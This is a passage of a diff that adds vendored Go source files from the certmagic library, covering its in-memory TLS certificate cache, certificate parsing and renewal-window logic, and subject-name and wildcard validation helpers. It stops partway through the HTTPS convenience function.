// Stop() to clean up resources even if the process
|
||||
// is being terminated, so that it can clean up
|
||||
// any locks for other processes to unblock!
|
||||
func NewCache(opts CacheOptions) *Cache {
|
||||
// assume default options if necessary
|
||||
if opts.OCSPCheckInterval <= 0 {
|
||||
opts.OCSPCheckInterval = DefaultOCSPCheckInterval
|
||||
}
|
||||
if opts.RenewCheckInterval <= 0 {
|
||||
opts.RenewCheckInterval = DefaultRenewCheckInterval
|
||||
}
|
||||
if opts.Capacity < 0 {
|
||||
opts.Capacity = 0
|
||||
}
|
||||
|
||||
// this must be set, because we cannot not
|
||||
// safely assume that the Default Config
|
||||
// is always the correct one to use
|
||||
if opts.GetConfigForCert == nil {
|
||||
panic("cache must be initialized with a GetConfigForCert callback")
|
||||
}
|
||||
|
||||
c := &Cache{
|
||||
options: opts,
|
||||
cache: make(map[string]Certificate),
|
||||
cacheIndex: make(map[string][]string),
|
||||
stopChan: make(chan struct{}),
|
||||
doneChan: make(chan struct{}),
|
||||
logger: opts.Logger,
|
||||
}
|
||||
|
||||
go c.maintainAssets(0)
|
||||
|
||||
return c
|
||||
}
|
||||
|
||||
// Stop stops the maintenance goroutine for
|
||||
// certificates in certCache. It blocks until
|
||||
// stopping is complete. Once a cache is
|
||||
// stopped, it cannot be reused.
|
||||
func (certCache *Cache) Stop() {
|
||||
close(certCache.stopChan) // signal to stop
|
||||
<-certCache.doneChan // wait for stop to complete
|
||||
}
|
||||
|
||||
// CacheOptions is used to configure certificate caches.
|
||||
// Once a cache has been created with certain options,
|
||||
// those settings cannot be changed.
|
||||
type CacheOptions struct {
|
||||
// REQUIRED. A function that returns a configuration
|
||||
// used for managing a certificate, or for accessing
|
||||
// that certificate's asset storage (e.g. for
|
||||
// OCSP staples, etc). The returned Config MUST
|
||||
// be associated with the same Cache as the caller.
|
||||
//
|
||||
// The reason this is a callback function, dynamically
|
||||
// returning a Config (instead of attaching a static
|
||||
// pointer to a Config on each certificate) is because
|
||||
// the config for how to manage a domain's certificate
|
||||
// might change from maintenance to maintenance. The
|
||||
// cache is so long-lived, we cannot assume that the
|
||||
// host's situation will always be the same; e.g. the
|
||||
// certificate might switch DNS providers, so the DNS
|
||||
// challenge (if used) would need to be adjusted from
|
||||
// the last time it was run ~8 weeks ago.
|
||||
GetConfigForCert ConfigGetter
|
||||
|
||||
// How often to check certificates for renewal;
|
||||
// if unset, DefaultOCSPCheckInterval will be used.
|
||||
OCSPCheckInterval time.Duration
|
||||
|
||||
// How often to check certificates for renewal;
|
||||
// if unset, DefaultRenewCheckInterval will be used.
|
||||
RenewCheckInterval time.Duration
|
||||
|
||||
// Maximum number of certificates to allow in the cache.
|
||||
// If reached, certificates will be randomly evicted to
|
||||
// make room for new ones. 0 means unlimited.
|
||||
Capacity int
|
||||
|
||||
// Set a logger to enable logging
|
||||
Logger *zap.Logger
|
||||
}
|
||||
|
||||
// ConfigGetter is a function that returns a prepared,
|
||||
// valid config that should be used when managing the
|
||||
// given certificate or its assets.
|
||||
type ConfigGetter func(Certificate) (*Config, error)
|
||||
|
||||
// cacheCertificate calls unsyncedCacheCertificate with a write lock.
|
||||
//
|
||||
// This function is safe for concurrent use.
|
||||
func (certCache *Cache) cacheCertificate(cert Certificate) {
|
||||
certCache.mu.Lock()
|
||||
certCache.unsyncedCacheCertificate(cert)
|
||||
certCache.mu.Unlock()
|
||||
}
|
||||
|
||||
// unsyncedCacheCertificate adds cert to the in-memory cache unless
|
||||
// it already exists in the cache (according to cert.Hash). It
|
||||
// updates the name index.
|
||||
//
|
||||
// This function is NOT safe for concurrent use. Callers MUST acquire
|
||||
// a write lock on certCache.mu first.
|
||||
func (certCache *Cache) unsyncedCacheCertificate(cert Certificate) {
|
||||
// no-op if this certificate already exists in the cache
|
||||
if _, ok := certCache.cache[cert.hash]; ok {
|
||||
if certCache.logger != nil {
|
||||
certCache.logger.Debug("certificate already cached",
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.String("issuer_key", cert.issuerKey),
|
||||
zap.String("hash", cert.hash))
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
// if the cache is at capacity, make room for new cert
|
||||
cacheSize := len(certCache.cache)
|
||||
if certCache.options.Capacity > 0 && cacheSize >= certCache.options.Capacity {
|
||||
// Go maps are "nondeterministic" but not actually random,
|
||||
// so although we could just chop off the "front" of the
|
||||
// map with less code, that is a heavily skewed eviction
|
||||
// strategy; generating random numbers is cheap and
|
||||
// ensures a much better distribution.
|
||||
rnd := weakrand.Intn(cacheSize)
|
||||
i := 0
|
||||
for _, randomCert := range certCache.cache {
|
||||
if i == rnd {
|
||||
if certCache.logger != nil {
|
||||
certCache.logger.Debug("cache full; evicting random certificate",
|
||||
zap.Strings("removing_subjects", randomCert.Names),
|
||||
zap.String("removing_hash", randomCert.hash),
|
||||
zap.Strings("inserting_subjects", cert.Names),
|
||||
zap.String("inserting_hash", cert.hash))
|
||||
}
|
||||
certCache.removeCertificate(randomCert)
|
||||
break
|
||||
}
|
||||
i++
|
||||
}
|
||||
}
|
||||
|
||||
// store the certificate
|
||||
certCache.cache[cert.hash] = cert
|
||||
|
||||
// update the index so we can access it by name
|
||||
for _, name := range cert.Names {
|
||||
certCache.cacheIndex[name] = append(certCache.cacheIndex[name], cert.hash)
|
||||
}
|
||||
|
||||
if certCache.logger != nil {
|
||||
certCache.logger.Debug("added certificate to cache",
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.String("issuer_key", cert.issuerKey),
|
||||
zap.String("hash", cert.hash),
|
||||
zap.Int("cache_size", len(certCache.cache)),
|
||||
zap.Int("cache_capacity", certCache.options.Capacity))
|
||||
}
|
||||
}
|
||||
|
||||
// removeCertificate removes cert from the cache.
|
||||
//
|
||||
// This function is NOT safe for concurrent use; callers
|
||||
// MUST first acquire a write lock on certCache.mu.
|
||||
func (certCache *Cache) removeCertificate(cert Certificate) {
|
||||
// delete all mentions of this cert from the name index
|
||||
for _, name := range cert.Names {
|
||||
keyList := certCache.cacheIndex[name]
|
||||
for i := 0; i < len(keyList); i++ {
|
||||
if keyList[i] == cert.hash {
|
||||
keyList = append(keyList[:i], keyList[i+1:]...)
|
||||
i--
|
||||
}
|
||||
}
|
||||
if len(keyList) == 0 {
|
||||
delete(certCache.cacheIndex, name)
|
||||
} else {
|
||||
certCache.cacheIndex[name] = keyList
|
||||
}
|
||||
}
|
||||
|
||||
// delete the actual cert from the cache
|
||||
delete(certCache.cache, cert.hash)
|
||||
|
||||
if certCache.logger != nil {
|
||||
certCache.logger.Debug("removed certificate from cache",
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.String("issuer_key", cert.issuerKey),
|
||||
zap.String("hash", cert.hash),
|
||||
zap.Int("cache_size", len(certCache.cache)),
|
||||
zap.Int("cache_capacity", certCache.options.Capacity))
|
||||
}
|
||||
}
|
||||
|
||||
// replaceCertificate atomically replaces oldCert with newCert in
|
||||
// the cache.
|
||||
//
|
||||
// This method is safe for concurrent use.
|
||||
func (certCache *Cache) replaceCertificate(oldCert, newCert Certificate) {
|
||||
certCache.mu.Lock()
|
||||
certCache.removeCertificate(oldCert)
|
||||
certCache.unsyncedCacheCertificate(newCert)
|
||||
certCache.mu.Unlock()
|
||||
if certCache.logger != nil {
|
||||
certCache.logger.Info("replaced certificate in cache",
|
||||
zap.Strings("subjects", newCert.Names),
|
||||
zap.Time("new_expiration", newCert.Leaf.NotAfter))
|
||||
}
|
||||
}
|
||||
|
||||
func (certCache *Cache) getAllMatchingCerts(name string) []Certificate {
|
||||
certCache.mu.RLock()
|
||||
defer certCache.mu.RUnlock()
|
||||
|
||||
allCertKeys := certCache.cacheIndex[name]
|
||||
|
||||
certs := make([]Certificate, len(allCertKeys))
|
||||
for i := range allCertKeys {
|
||||
certs[i] = certCache.cache[allCertKeys[i]]
|
||||
}
|
||||
|
||||
return certs
|
||||
}
|
||||
|
||||
func (certCache *Cache) getAllCerts() []Certificate {
|
||||
certCache.mu.RLock()
|
||||
defer certCache.mu.RUnlock()
|
||||
certs := make([]Certificate, 0, len(certCache.cache))
|
||||
for _, cert := range certCache.cache {
|
||||
certs = append(certs, cert)
|
||||
}
|
||||
return certs
|
||||
}
|
||||
|
||||
func (certCache *Cache) getConfig(cert Certificate) (*Config, error) {
|
||||
cfg, err := certCache.options.GetConfigForCert(cert)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if cfg.certCache != nil && cfg.certCache != certCache {
|
||||
return nil, fmt.Errorf("config returned for certificate %v is not nil and points to different cache; got %p, expected %p (this one)",
|
||||
cert.Names, cfg.certCache, certCache)
|
||||
}
|
||||
return cfg, nil
|
||||
}
|
||||
|
||||
// AllMatchingCertificates returns a list of all certificates that could
|
||||
// be used to serve the given SNI name, including exact SAN matches and
|
||||
// wildcard matches.
|
||||
func (certCache *Cache) AllMatchingCertificates(name string) []Certificate {
|
||||
// get exact matches first
|
||||
certs := certCache.getAllMatchingCerts(name)
|
||||
|
||||
// then look for wildcard matches by replacing each
|
||||
// label of the domain name with wildcards
|
||||
labels := strings.Split(name, ".")
|
||||
for i := range labels {
|
||||
labels[i] = "*"
|
||||
candidate := strings.Join(labels, ".")
|
||||
certs = append(certs, certCache.getAllMatchingCerts(candidate)...)
|
||||
}
|
||||
|
||||
return certs
|
||||
}
|
||||
|
||||
var (
|
||||
defaultCache *Cache
|
||||
defaultCacheMu sync.Mutex
|
||||
)
|
429
vendor/github.com/caddyserver/certmagic/certificates.go
generated
vendored
Normal file
429
vendor/github.com/caddyserver/certmagic/certificates.go
generated
vendored
Normal file
@ -0,0 +1,429 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/tls"
|
||||
"crypto/x509"
|
||||
"fmt"
|
||||
"net"
|
||||
"os"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"go.uber.org/zap"
|
||||
"golang.org/x/crypto/ocsp"
|
||||
)
|
||||
|
||||
// Certificate is a tls.Certificate with associated metadata tacked on.
|
||||
// Even if the metadata can be obtained by parsing the certificate,
|
||||
// we are more efficient by extracting the metadata onto this struct,
|
||||
// but at the cost of slightly higher memory use.
|
||||
type Certificate struct {
|
||||
tls.Certificate
|
||||
|
||||
// Names is the list of subject names this
|
||||
// certificate is signed for.
|
||||
Names []string
|
||||
|
||||
// Optional; user-provided, and arbitrary.
|
||||
Tags []string
|
||||
|
||||
// OCSP contains the certificate's parsed OCSP response.
|
||||
// It is not necessarily the response that is stapled
|
||||
// (e.g. if the status is not Good), it is simply the
|
||||
// most recent OCSP response we have for this certificate.
|
||||
ocsp *ocsp.Response
|
||||
|
||||
// The hex-encoded hash of this cert's chain's bytes.
|
||||
hash string
|
||||
|
||||
// Whether this certificate is under our management.
|
||||
managed bool
|
||||
|
||||
// The unique string identifying the issuer of this certificate.
|
||||
issuerKey string
|
||||
}
|
||||
|
||||
// Empty returns true if the certificate struct is not filled out; at
|
||||
// least the tls.Certificate.Certificate field is expected to be set.
|
||||
func (cert Certificate) Empty() bool {
|
||||
return len(cert.Certificate.Certificate) == 0
|
||||
}
|
||||
|
||||
// NeedsRenewal returns true if the certificate is
|
||||
// expiring soon (according to cfg) or has expired.
|
||||
func (cert Certificate) NeedsRenewal(cfg *Config) bool {
|
||||
return currentlyInRenewalWindow(cert.Leaf.NotBefore, cert.Leaf.NotAfter, cfg.RenewalWindowRatio)
|
||||
}
|
||||
|
||||
// Expired returns true if the certificate has expired.
|
||||
func (cert Certificate) Expired() bool {
|
||||
if cert.Leaf == nil {
|
||||
// ideally cert.Leaf would never be nil, but this can happen for
|
||||
// "synthetic" certs like those made to solve the TLS-ALPN challenge
|
||||
// which adds a special cert directly to the cache, since
|
||||
// tls.X509KeyPair() discards the leaf; oh well
|
||||
return false
|
||||
}
|
||||
return time.Now().After(cert.Leaf.NotAfter)
|
||||
}
|
||||
|
||||
// currentlyInRenewalWindow returns true if the current time is
|
||||
// within the renewal window, according to the given start/end
|
||||
// dates and the ratio of the renewal window. If true is returned,
|
||||
// the certificate being considered is due for renewal.
|
||||
func currentlyInRenewalWindow(notBefore, notAfter time.Time, renewalWindowRatio float64) bool {
|
||||
if notAfter.IsZero() {
|
||||
return false
|
||||
}
|
||||
lifetime := notAfter.Sub(notBefore)
|
||||
if renewalWindowRatio == 0 {
|
||||
renewalWindowRatio = DefaultRenewalWindowRatio
|
||||
}
|
||||
renewalWindow := time.Duration(float64(lifetime) * renewalWindowRatio)
|
||||
renewalWindowStart := notAfter.Add(-renewalWindow)
|
||||
return time.Now().After(renewalWindowStart)
|
||||
}
|
||||
|
||||
// HasTag returns true if cert.Tags has tag.
|
||||
func (cert Certificate) HasTag(tag string) bool {
|
||||
for _, t := range cert.Tags {
|
||||
if t == tag {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// CacheManagedCertificate loads the certificate for domain into the
|
||||
// cache, from the TLS storage for managed certificates. It returns a
|
||||
// copy of the Certificate that was put into the cache.
|
||||
//
|
||||
// This is a lower-level method; normally you'll call Manage() instead.
|
||||
//
|
||||
// This method is safe for concurrent use.
|
||||
func (cfg *Config) CacheManagedCertificate(ctx context.Context, domain string) (Certificate, error) {
|
||||
cert, err := cfg.loadManagedCertificate(ctx, domain)
|
||||
if err != nil {
|
||||
return cert, err
|
||||
}
|
||||
cfg.certCache.cacheCertificate(cert)
|
||||
cfg.emit("cached_managed_cert", cert.Names)
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// loadManagedCertificate loads the managed certificate for domain from any
|
||||
// of the configured issuers' storage locations, but it does not add it to
|
||||
// the cache. It just loads from storage and returns it.
|
||||
func (cfg *Config) loadManagedCertificate(ctx context.Context, domain string) (Certificate, error) {
|
||||
certRes, err := cfg.loadCertResourceAnyIssuer(ctx, domain)
|
||||
if err != nil {
|
||||
return Certificate{}, err
|
||||
}
|
||||
cert, err := cfg.makeCertificateWithOCSP(ctx, certRes.CertificatePEM, certRes.PrivateKeyPEM)
|
||||
if err != nil {
|
||||
return cert, err
|
||||
}
|
||||
cert.managed = true
|
||||
cert.issuerKey = certRes.issuerKey
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// CacheUnmanagedCertificatePEMFile loads a certificate for host using certFile
|
||||
// and keyFile, which must be in PEM format. It stores the certificate in
|
||||
// the in-memory cache.
|
||||
//
|
||||
// This method is safe for concurrent use.
|
||||
func (cfg *Config) CacheUnmanagedCertificatePEMFile(ctx context.Context, certFile, keyFile string, tags []string) error {
|
||||
cert, err := cfg.makeCertificateFromDiskWithOCSP(ctx, cfg.Storage, certFile, keyFile)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
cert.Tags = tags
|
||||
cfg.certCache.cacheCertificate(cert)
|
||||
cfg.emit("cached_unmanaged_cert", cert.Names)
|
||||
return nil
|
||||
}
|
||||
|
||||
// CacheUnmanagedTLSCertificate adds tlsCert to the certificate cache.
|
||||
// It staples OCSP if possible.
|
||||
//
|
||||
// This method is safe for concurrent use.
|
||||
func (cfg *Config) CacheUnmanagedTLSCertificate(ctx context.Context, tlsCert tls.Certificate, tags []string) error {
|
||||
var cert Certificate
|
||||
err := fillCertFromLeaf(&cert, tlsCert)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
err = stapleOCSP(ctx, cfg.OCSP, cfg.Storage, &cert, nil)
|
||||
if err != nil && cfg.Logger != nil {
|
||||
cfg.Logger.Warn("stapling OCSP", zap.Error(err))
|
||||
}
|
||||
cfg.emit("cached_unmanaged_cert", cert.Names)
|
||||
cert.Tags = tags
|
||||
cfg.certCache.cacheCertificate(cert)
|
||||
return nil
|
||||
}
|
||||
|
||||
// CacheUnmanagedCertificatePEMBytes makes a certificate out of the PEM bytes
|
||||
// of the certificate and key, then caches it in memory.
|
||||
//
|
||||
// This method is safe for concurrent use.
|
||||
func (cfg *Config) CacheUnmanagedCertificatePEMBytes(ctx context.Context, certBytes, keyBytes []byte, tags []string) error {
|
||||
cert, err := cfg.makeCertificateWithOCSP(ctx, certBytes, keyBytes)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
cert.Tags = tags
|
||||
cfg.certCache.cacheCertificate(cert)
|
||||
cfg.emit("cached_unmanaged_cert", cert.Names)
|
||||
return nil
|
||||
}
|
||||
|
||||
// makeCertificateFromDiskWithOCSP makes a Certificate by loading the
|
||||
// certificate and key files. It fills out all the fields in
|
||||
// the certificate except for the Managed and OnDemand flags.
|
||||
// (It is up to the caller to set those.) It staples OCSP.
|
||||
func (cfg Config) makeCertificateFromDiskWithOCSP(ctx context.Context, storage Storage, certFile, keyFile string) (Certificate, error) {
|
||||
certPEMBlock, err := os.ReadFile(certFile)
|
||||
if err != nil {
|
||||
return Certificate{}, err
|
||||
}
|
||||
keyPEMBlock, err := os.ReadFile(keyFile)
|
||||
if err != nil {
|
||||
return Certificate{}, err
|
||||
}
|
||||
return cfg.makeCertificateWithOCSP(ctx, certPEMBlock, keyPEMBlock)
|
||||
}
|
||||
|
||||
// makeCertificateWithOCSP is the same as makeCertificate except that it also
|
||||
// staples OCSP to the certificate.
|
||||
func (cfg Config) makeCertificateWithOCSP(ctx context.Context, certPEMBlock, keyPEMBlock []byte) (Certificate, error) {
|
||||
cert, err := makeCertificate(certPEMBlock, keyPEMBlock)
|
||||
if err != nil {
|
||||
return cert, err
|
||||
}
|
||||
err = stapleOCSP(ctx, cfg.OCSP, cfg.Storage, &cert, certPEMBlock)
|
||||
if err != nil && cfg.Logger != nil {
|
||||
cfg.Logger.Warn("stapling OCSP", zap.Error(err), zap.Strings("identifiers", cert.Names))
|
||||
}
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// makeCertificate turns a certificate PEM bundle and a key PEM block into
|
||||
// a Certificate with necessary metadata from parsing its bytes filled into
|
||||
// its struct fields for convenience (except for the OnDemand and Managed
|
||||
// flags; it is up to the caller to set those properties!). This function
|
||||
// does NOT staple OCSP.
|
||||
func makeCertificate(certPEMBlock, keyPEMBlock []byte) (Certificate, error) {
|
||||
var cert Certificate
|
||||
|
||||
// Convert to a tls.Certificate
|
||||
tlsCert, err := tls.X509KeyPair(certPEMBlock, keyPEMBlock)
|
||||
if err != nil {
|
||||
return cert, err
|
||||
}
|
||||
|
||||
// Extract necessary metadata
|
||||
err = fillCertFromLeaf(&cert, tlsCert)
|
||||
if err != nil {
|
||||
return cert, err
|
||||
}
|
||||
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// fillCertFromLeaf populates cert from tlsCert. If it succeeds, it
|
||||
// guarantees that cert.Leaf is non-nil.
|
||||
func fillCertFromLeaf(cert *Certificate, tlsCert tls.Certificate) error {
|
||||
if len(tlsCert.Certificate) == 0 {
|
||||
return fmt.Errorf("certificate is empty")
|
||||
}
|
||||
cert.Certificate = tlsCert
|
||||
|
||||
// the leaf cert should be the one for the site; we must set
|
||||
// the tls.Certificate.Leaf field so that TLS handshakes are
|
||||
// more efficient
|
||||
leaf := cert.Certificate.Leaf
|
||||
if leaf == nil {
|
||||
var err error
|
||||
leaf, err = x509.ParseCertificate(tlsCert.Certificate[0])
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
cert.Certificate.Leaf = leaf
|
||||
}
|
||||
|
||||
// for convenience, we do want to assemble all the
|
||||
// subjects on the certificate into one list
|
||||
if leaf.Subject.CommonName != "" { // TODO: CommonName is deprecated
|
||||
cert.Names = []string{strings.ToLower(leaf.Subject.CommonName)}
|
||||
}
|
||||
for _, name := range leaf.DNSNames {
|
||||
if name != leaf.Subject.CommonName { // TODO: CommonName is deprecated
|
||||
cert.Names = append(cert.Names, strings.ToLower(name))
|
||||
}
|
||||
}
|
||||
for _, ip := range leaf.IPAddresses {
|
||||
if ipStr := ip.String(); ipStr != leaf.Subject.CommonName { // TODO: CommonName is deprecated
|
||||
cert.Names = append(cert.Names, strings.ToLower(ipStr))
|
||||
}
|
||||
}
|
||||
for _, email := range leaf.EmailAddresses {
|
||||
if email != leaf.Subject.CommonName { // TODO: CommonName is deprecated
|
||||
cert.Names = append(cert.Names, strings.ToLower(email))
|
||||
}
|
||||
}
|
||||
for _, u := range leaf.URIs {
|
||||
if u.String() != leaf.Subject.CommonName { // TODO: CommonName is deprecated
|
||||
cert.Names = append(cert.Names, u.String())
|
||||
}
|
||||
}
|
||||
if len(cert.Names) == 0 {
|
||||
return fmt.Errorf("certificate has no names")
|
||||
}
|
||||
|
||||
cert.hash = hashCertificateChain(cert.Certificate.Certificate)
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// managedCertInStorageExpiresSoon returns true if cert (being a
|
||||
// managed certificate) is expiring within RenewDurationBefore.
|
||||
// It returns false if there was an error checking the expiration
|
||||
// of the certificate as found in storage, or if the certificate
|
||||
// in storage is NOT expiring soon. A certificate that is expiring
|
||||
// soon in our cache but is not expiring soon in storage probably
|
||||
// means that another instance renewed the certificate in the
|
||||
// meantime, and it would be a good idea to simply load the cert
|
||||
// into our cache rather than repeating the renewal process again.
|
||||
func (cfg *Config) managedCertInStorageExpiresSoon(ctx context.Context, cert Certificate) (bool, error) {
|
||||
certRes, err := cfg.loadCertResourceAnyIssuer(ctx, cert.Names[0])
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
_, needsRenew := cfg.managedCertNeedsRenewal(certRes)
|
||||
return needsRenew, nil
|
||||
}
|
||||
|
||||
// reloadManagedCertificate reloads the certificate corresponding to the name(s)
|
||||
// on oldCert into the cache, from storage. This also replaces the old certificate
|
||||
// with the new one, so that all configurations that used the old cert now point
|
||||
// to the new cert. It assumes that the new certificate for oldCert.Names[0] is
|
||||
// already in storage. It returns the newly-loaded certificate if successful.
|
||||
func (cfg *Config) reloadManagedCertificate(ctx context.Context, oldCert Certificate) (Certificate, error) {
|
||||
if cfg.Logger != nil {
|
||||
cfg.Logger.Info("reloading managed certificate", zap.Strings("identifiers", oldCert.Names))
|
||||
}
|
||||
newCert, err := cfg.loadManagedCertificate(ctx, oldCert.Names[0])
|
||||
if err != nil {
|
||||
return Certificate{}, fmt.Errorf("loading managed certificate for %v from storage: %v", oldCert.Names, err)
|
||||
}
|
||||
cfg.certCache.replaceCertificate(oldCert, newCert)
|
||||
return newCert, nil
|
||||
}
|
||||
|
||||
// SubjectQualifiesForCert returns true if subj is a name which,
|
||||
// as a quick sanity check, looks like it could be the subject
|
||||
// of a certificate. Requirements are:
|
||||
// - must not be empty
|
||||
// - must not start or end with a dot (RFC 1034)
|
||||
// - must not contain common accidental special characters
|
||||
func SubjectQualifiesForCert(subj string) bool {
|
||||
// must not be empty
|
||||
return strings.TrimSpace(subj) != "" &&
|
||||
|
||||
// must not start or end with a dot
|
||||
!strings.HasPrefix(subj, ".") &&
|
||||
!strings.HasSuffix(subj, ".") &&
|
||||
|
||||
// if it has a wildcard, must be a left-most label (or exactly "*"
|
||||
// which won't be trusted by browsers but still technically works)
|
||||
(!strings.Contains(subj, "*") || strings.HasPrefix(subj, "*.") || subj == "*") &&
|
||||
|
||||
// must not contain other common special characters
|
||||
!strings.ContainsAny(subj, "()[]{}<> \t\n\"\\!@#$%^&|;'+=")
|
||||
}
|
||||
|
||||
// SubjectQualifiesForPublicCert returns true if the subject
|
||||
// name appears eligible for automagic TLS with a public
|
||||
// CA such as Let's Encrypt. For example: localhost and IP
|
||||
// addresses are not eligible because we cannot obtain certs
|
||||
// for those names with a public CA. Wildcard names are
|
||||
// allowed, as long as they conform to CABF requirements (only
|
||||
// one wildcard label, and it must be the left-most label).
|
||||
func SubjectQualifiesForPublicCert(subj string) bool {
|
||||
// must at least qualify for a certificate
|
||||
return SubjectQualifiesForCert(subj) &&
|
||||
|
||||
// localhost, .localhost TLD, and .local TLD are ineligible
|
||||
!SubjectIsInternal(subj) &&
|
||||
|
||||
// cannot be an IP address (as of yet), see
|
||||
// https://community.letsencrypt.org/t/certificate-for-static-ip/84/2?u=mholt
|
||||
!SubjectIsIP(subj) &&
|
||||
|
||||
// only one wildcard label allowed, and it must be left-most, with 3+ labels
|
||||
(!strings.Contains(subj, "*") ||
|
||||
(strings.Count(subj, "*") == 1 &&
|
||||
strings.Count(subj, ".") > 1 &&
|
||||
len(subj) > 2 &&
|
||||
strings.HasPrefix(subj, "*.")))
|
||||
}
|
||||
|
||||
// SubjectIsIP returns true if subj is an IP address.
|
||||
func SubjectIsIP(subj string) bool {
|
||||
return net.ParseIP(subj) != nil
|
||||
}
|
||||
|
||||
// SubjectIsInternal returns true if subj is an internal-facing
|
||||
// hostname or address.
|
||||
func SubjectIsInternal(subj string) bool {
|
||||
return subj == "localhost" ||
|
||||
strings.HasSuffix(subj, ".localhost") ||
|
||||
strings.HasSuffix(subj, ".local")
|
||||
}
|
||||
|
||||
// MatchWildcard returns true if subject (a candidate DNS name)
|
||||
// matches wildcard (a reference DNS name), mostly according to
|
||||
// RFC 6125-compliant wildcard rules. See also RFC 2818 which
|
||||
// states that IP addresses must match exactly, but this function
|
||||
// does not attempt to distinguish IP addresses from internal or
|
||||
// external DNS names that happen to look like IP addresses.
|
||||
// It uses DNS wildcard matching logic and is case-insensitive.
|
||||
// https://tools.ietf.org/html/rfc2818#section-3.1
|
||||
func MatchWildcard(subject, wildcard string) bool {
|
||||
subject, wildcard = strings.ToLower(subject), strings.ToLower(wildcard)
|
||||
if subject == wildcard {
|
||||
return true
|
||||
}
|
||||
if !strings.Contains(wildcard, "*") {
|
||||
return false
|
||||
}
|
||||
labels := strings.Split(subject, ".")
|
||||
for i := range labels {
|
||||
if labels[i] == "" {
|
||||
continue // invalid label
|
||||
}
|
||||
labels[i] = "*"
|
||||
candidate := strings.Join(labels, ".")
|
||||
if candidate == wildcard {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
506
vendor/github.com/caddyserver/certmagic/certmagic.go
generated
vendored
Normal file
506
vendor/github.com/caddyserver/certmagic/certmagic.go
generated
vendored
Normal file
@ -0,0 +1,506 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
// Package certmagic automates the obtaining and renewal of TLS certificates,
|
||||
// including TLS & HTTPS best practices such as robust OCSP stapling, caching,
|
||||
// HTTP->HTTPS redirects, and more.
|
||||
//
|
||||
// Its high-level API serves your HTTP handlers over HTTPS if you simply give
|
||||
// the domain name(s) and the http.Handler; CertMagic will create and run
|
||||
// the HTTPS server for you, fully managing certificates during the lifetime
|
||||
// of the server. Similarly, it can be used to start TLS listeners or return
|
||||
// a ready-to-use tls.Config -- whatever layer you need TLS for, CertMagic
|
||||
// makes it easy. See the HTTPS, Listen, and TLS functions for that.
|
||||
//
|
||||
// If you need more control, create a Cache using NewCache() and then make
|
||||
// a Config using New(). You can then call Manage() on the config. But if
|
||||
// you use this lower-level API, you'll have to be sure to solve the HTTP
|
||||
// and TLS-ALPN challenges yourself (unless you disabled them or use the
|
||||
// DNS challenge) by using the provided Config.GetCertificate function
|
||||
// in your tls.Config and/or Config.HTTPChallangeHandler in your HTTP
|
||||
// handler.
|
||||
//
|
||||
// See the package's README for more instruction.
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto"
|
||||
"crypto/tls"
|
||||
"crypto/x509"
|
||||
"fmt"
|
||||
"log"
|
||||
"net"
|
||||
"net/http"
|
||||
"sort"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
// HTTPS serves mux for all domainNames using the HTTP
|
||||
// and HTTPS ports, redirecting all HTTP requests to HTTPS.
|
||||
// It uses the Default config and a background context.
|
||||
//
|
||||
// This high-level convenience function is opinionated and
|
||||
// applies sane defaults for production use, including
|
||||
// timeouts for HTTP requests and responses. To allow very
|
||||
// long-lived connections, you should make your own
|
||||
// http.Server values and use this package's Listen(), TLS(),
|
||||
// or Config.TLSConfig() functions to customize to your needs.
|
||||
// For example, servers which need to support large uploads or
|
||||
// downloads with slow clients may need to use longer timeouts,
|
||||
// thus this function is not suitable.
|
||||
//
|
||||
// Calling this function signifies your acceptance to
|
||||
// the CA's Subscriber Agreement and/or Terms of Service.
|
||||
func HTTPS(domainNames []string, mux http.Handler) error {
|
||||
ctx := context.Background()
|
||||
|
||||
if mux == nil {
|
||||
mux = http.DefaultServeMux
|
||||
}
|
||||
|
||||
DefaultACME.Agreed = true
|
||||
cfg := NewDefault()
|
||||
|
||||
err := cfg.ManageSync(ctx, domainNames)
|
||||
if err != nil {
